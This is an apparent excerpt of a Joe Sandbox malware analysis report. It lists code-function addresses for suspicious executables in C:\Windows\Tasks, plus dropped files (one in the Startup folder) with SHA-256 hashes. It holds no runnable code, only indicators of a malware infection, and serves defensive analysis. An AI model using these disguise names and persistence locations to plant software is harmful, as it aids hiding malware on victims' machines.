                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140020A2C37_2_0000000140020A2C
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014000EE5037_2_000000014000EE50
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014000D2D037_2_000000014000D2D0
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140021B4037_2_0000000140021B40
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_0000000140002B5037_2_0000000140002B50
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014001ABAC37_2_000000014001ABAC
                                  Source: C:\Windows\Tasks\Wmiic.exeCode function: 37_2_000000014001DBB837_2_000000014001DBB8
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D07F8C42_2_00007FF726D07F8C
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CFD3FC42_2_00007FF726CFD3FC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0C7D442_2_00007FF726D0C7D4
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D1178842_2_00007FF726D11788
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CFE82C42_2_00007FF726CFE82C
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CFF5EC42_2_00007FF726CFF5EC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0E5EC42_2_00007FF726D0E5EC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726CFEDCC42_2_00007FF726CFEDCC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0AD2842_2_00007FF726D0AD28
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0471442_2_00007FF726D04714
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0869042_2_00007FF726D08690
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0FB4042_2_00007FF726D0FB40
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0B4FC42_2_00007FF726D0B4FC
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D1149842_2_00007FF726D11498
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0342842_2_00007FF726D03428
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D059E442_2_00007FF726D059E4
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D0C9E042_2_00007FF726D0C9E0
                                  Source: C:\Windows\Tasks\Wrap.exeCode function: 42_2_00007FF726D1216C42_2_00007FF726D1216C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB74AC56_2_00007FF7B1DB74AC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D96B5056_2_00007FF7B1D96B50
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB656056_2_00007FF7B1DB6560
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DAE2DC56_2_00007FF7B1DAE2DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA3A5856_2_00007FF7B1DA3A58
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA811056_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA321C56_2_00007FF7B1DA321C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DBA1E856_2_00007FF7B1DBA1E8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA618056_2_00007FF7B1DA6180
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA119056_2_00007FF7B1DA1190
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA899456_2_00007FF7B1DA8994
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB112856_2_00007FF7B1DB1128
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1D984A056_2_00007FF7B1D984A0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB112856_2_00007FF7B1DB1128
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB447056_2_00007FF7B1DB4470
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA139456_2_00007FF7B1DA1394
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA236C56_2_00007FF7B1DA236C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA270456_2_00007FF7B1DA2704
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DAA6F056_2_00007FF7B1DAA6F0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA365456_2_00007FF7B1DA3654
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DAEDF056_2_00007FF7B1DAEDF0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA15A056_2_00007FF7B1DA15A0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA0D8056_2_00007FF7B1DA0D80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA811056_2_00007FF7B1DA8110
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB490C56_2_00007FF7B1DB490C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB20D456_2_00007FF7B1DB20D4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB67DC56_2_00007FF7B1DB67DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA17A456_2_00007FF7B1DA17A4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA0F8456_2_00007FF7B1DA0F84
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DB6F6056_2_00007FF7B1DB6F60
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DA7F5C56_2_00007FF7B1DA7F5C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 56_2_00007FF7B1DAE77056_2_00007FF7B1DAE770
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E848E60_2_003E848E
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F00B760_2_003F00B7
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F408860_2_003F4088
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E40FE60_2_003E40FE
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F715360_2_003F7153
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_004051C960_2_004051C9
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E32F760_2_003E32F7
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F62CA60_2_003F62CA
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F43BF60_2_003F43BF
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_0040D44060_2_0040D440
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EC42660_2_003EC426
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EF46160_2_003EF461
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F77EF60_2_003F77EF
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003E286B60_2_003E286B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_0040D8EE60_2_0040D8EE
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EE9B760_2_003EE9B7
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_004119F460_2_004119F4
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F6CDC60_2_003F6CDC
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003F3E0B60_2_003F3E0B
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_00404F9A60_2_00404F9A
                                  Source: C:\Windows\Tasks\1.exeCode function: 60_2_003EEFE260_2_003EEFE2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB233B8062_2_00007FFDFB233B80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13FB7062_2_00007FFDFB13FB70
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0012C162_2_00007FFDFB0012C1
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00402562_2_00007FFDFB004025
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB19BA7062_2_00007FFDFB19BA70
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB06FB0062_2_00007FFDFB06FB00
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00385F62_2_00007FFDFB00385F
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003C1A62_2_00007FFDFB003C1A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004B2462_2_00007FFDFB004B24
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00250462_2_00007FFDFB002504
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002BC662_2_00007FFDFB002BC6
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00513C62_2_00007FFDFB00513C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1AFF8062_2_00007FFDFB1AFF80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB12BFA062_2_00007FFDFB12BFA0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB197E7062_2_00007FFDFB197E70
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00719462_2_00007FFDFB007194
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00135C62_2_00007FFDFB00135C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01BF2062_2_00007FFDFB01BF20
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01BD6062_2_00007FFDFB01BD60
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00200E62_2_00007FFDFB00200E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001B9562_2_00007FFDFB001B95
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0048CC62_2_00007FFDFB0048CC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002A2762_2_00007FFDFB002A27
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01F20062_2_00007FFDFB01F200
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004B7462_2_00007FFDFB004B74
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00251362_2_00007FFDFB002513
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00522762_2_00007FFDFB005227
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01F06062_2_00007FFDFB01F060
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003EB362_2_00007FFDFB003EB3
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00188962_2_00007FFDFB001889
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001B7262_2_00007FFDFB001B72
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00282E62_2_00007FFDFB00282E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0011DB62_2_00007FFDFB0011DB
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB02B85062_2_00007FFDFB02B850
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003DBE62_2_00007FFDFB003DBE
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00465162_2_00007FFDFB004651
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB12B60062_2_00007FFDFB12B600
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB02B4C062_2_00007FFDFB02B4C0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1974F062_2_00007FFDFB1974F0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005B9162_2_00007FFDFB005B91
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00671762_2_00007FFDFB006717
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0060D762_2_00007FFDFB0060D7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003EA462_2_00007FFDFB003EA4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0012A862_2_00007FFDFB0012A8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00520462_2_00007FFDFB005204
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0069F662_2_00007FFDFB0069F6
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001AE162_2_00007FFDFB001AE1
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001EB062_2_00007FFDFB001EB0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0EA87062_2_00007FFDFB0EA870
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00105F62_2_00007FFDFB00105F
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00659662_2_00007FFDFB006596
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB19A91062_2_00007FFDFB19A910
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001F7362_2_00007FFDFB001F73
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00211262_2_00007FFDFB002112
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0051D762_2_00007FFDFB0051D7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00267162_2_00007FFDFB002671
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB12EE8062_2_00007FFDFB12EE80
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01EF0062_2_00007FFDFB01EF00
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0060DC62_2_00007FFDFB0060DC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0034AE62_2_00007FFDFB0034AE
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13EDB062_2_00007FFDFB13EDB0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001BC762_2_00007FFDFB001BC7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0024AA62_2_00007FFDFB0024AA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0E241062_2_00007FFDFB0E2410
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00691562_2_00007FFDFB006915
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004DA462_2_00007FFDFB004DA4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002D6062_2_00007FFDFB002D60
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00309962_2_00007FFDFB003099
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00442162_2_00007FFDFB004421
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0019D862_2_00007FFDFB0019D8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00600062_2_00007FFDFB006000
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00258B62_2_00007FFDFB00258B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13671062_2_00007FFDFB136710
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00412962_2_00007FFDFB004129
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002B2B62_2_00007FFDFB002B2B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00654B62_2_00007FFDFB00654B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004E7B62_2_00007FFDFB004E7B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB006BA462_2_00007FFDFB006BA4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002E0A62_2_00007FFDFB002E0A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004B9C62_2_00007FFDFB004B9C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00227A62_2_00007FFDFB00227A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB139AF062_2_00007FFDFB139AF0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00488B62_2_00007FFDFB00488B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0035DA62_2_00007FFDFB0035DA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00375B62_2_00007FFDFB00375B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002F2C62_2_00007FFDFB002F2C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00234262_2_00007FFDFB002342
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0036D462_2_00007FFDFB0036D4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00242862_2_00007FFDFB002428
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0037E762_2_00007FFDFB0037E7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB135F0062_2_00007FFDFB135F00
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00591B62_2_00007FFDFB00591B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00623062_2_00007FFDFB006230
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0051D262_2_00007FFDFB0051D2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1B1E4062_2_00007FFDFB1B1E40
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002A9062_2_00007FFDFB002A90
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001C2162_2_00007FFDFB001C21
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01D26062_2_00007FFDFB01D260
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0071C162_2_00007FFDFB0071C1
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0045BB62_2_00007FFDFB0045BB
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB13132062_2_00007FFDFB131320
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00309462_2_00007FFDFB003094
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB02520062_2_00007FFDFB025200
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001AEB62_2_00007FFDFB001AEB
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00499962_2_00007FFDFB004999
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00731A62_2_00007FFDFB00731A
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB1B169062_2_00007FFDFB1B1690
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003BF762_2_00007FFDFB003BF7
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00276162_2_00007FFDFB002761
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0011CC62_2_00007FFDFB0011CC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002E3262_2_00007FFDFB002E32
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00183962_2_00007FFDFB001839
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005BBE62_2_00007FFDFB005BBE
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003EE062_2_00007FFDFB003EE0
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0024A562_2_00007FFDFB0024A5
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003E1D62_2_00007FFDFB003E1D
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00651E62_2_00007FFDFB00651E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0062DA62_2_00007FFDFB0062DA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00320662_2_00007FFDFB003206
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB19C99062_2_00007FFDFB19C990
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB006E7E62_2_00007FFDFB006E7E
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB003DC862_2_00007FFDFB003DC8
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB134A4062_2_00007FFDFB134A40
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005CF462_2_00007FFDFB005CF4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00641562_2_00007FFDFB006415
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB004DEA62_2_00007FFDFB004DEA
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00501562_2_00007FFDFB005015
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00293262_2_00007FFDFB002932
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00588062_2_00007FFDFB005880
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00452062_2_00007FFDFB004520
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB005FEC62_2_00007FFDFB005FEC
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00373862_2_00007FFDFB003738
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00400C62_2_00007FFDFB00400C
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00298762_2_00007FFDFB002987
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB001E7962_2_00007FFDFB001E79
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00104162_2_00007FFDFB001041
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00608762_2_00007FFDFB006087
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB134D5062_2_00007FFDFB134D50
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00380562_2_00007FFDFB003805
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00703662_2_00007FFDFB007036
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00111D62_2_00007FFDFB00111D
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0B026062_2_00007FFDFB0B0260
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00571D62_2_00007FFDFB00571D
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00396862_2_00007FFDFB003968
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002BF362_2_00007FFDFB002BF3
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB14017062_2_00007FFDFB140170
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0071B262_2_00007FFDFB0071B2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00627B62_2_00007FFDFB00627B
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0066C262_2_00007FFDFB0066C2
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002C5262_2_00007FFDFB002C52
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00313462_2_00007FFDFB003134
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0017E462_2_00007FFDFB0017E4
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002EAF62_2_00007FFDFB002EAF
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB00733862_2_00007FFDFB007338
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB002ABD62_2_00007FFDFB002ABD
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01C62062_2_00007FFDFB01C620
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB01C48062_2_00007FFDFB01C480
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: 62_2_00007FFDFB0012EE62_2_00007FFDFB0012EE
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9AFF0DA365_2_00007FFD9AFF0DA3
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A3B6D65_2_00007FFD9B1A3B6D
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A4AA065_2_00007FFD9B1A4AA0
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A52F265_2_00007FFD9B1A52F2
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B19084F65_2_00007FFD9B19084F
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A56F265_2_00007FFD9B1A56F2
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A659C65_2_00007FFD9B1A659C
                                  Source: C:\Windows\Bridgeprovider.exeCode function: 65_2_00007FFD9B1A4DD465_2_00007FFD9B1A4DD4
                                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\MicrosoftPrt.exe 16D2F6194D1B1989FBEF4572055DBF62A0D6A2570B316AC15722192F1C559A50
                                  Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\Aepdvrho.log 3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB00206D appears 82 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FF7B1D92010 appears 52 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB005DDA appears 737 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001C08 appears 121 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001FFF appears 31 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001055 appears 1557 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB004688 appears 138 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB0041F6 appears 47 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB001FC3 appears 55 times
                                  Source: C:\Windows\Tasks\MSTask.exeCode function: String function: 00007FFDFB0040F7 appears 384 times
                                  Source: C:\ProgramData\migrate.exeCode function: String function: 0012EB78 appears 39 times
                                  Source: C:\ProgramData\migrate.exeCode function: String function: 0012EC50 appears 56 times
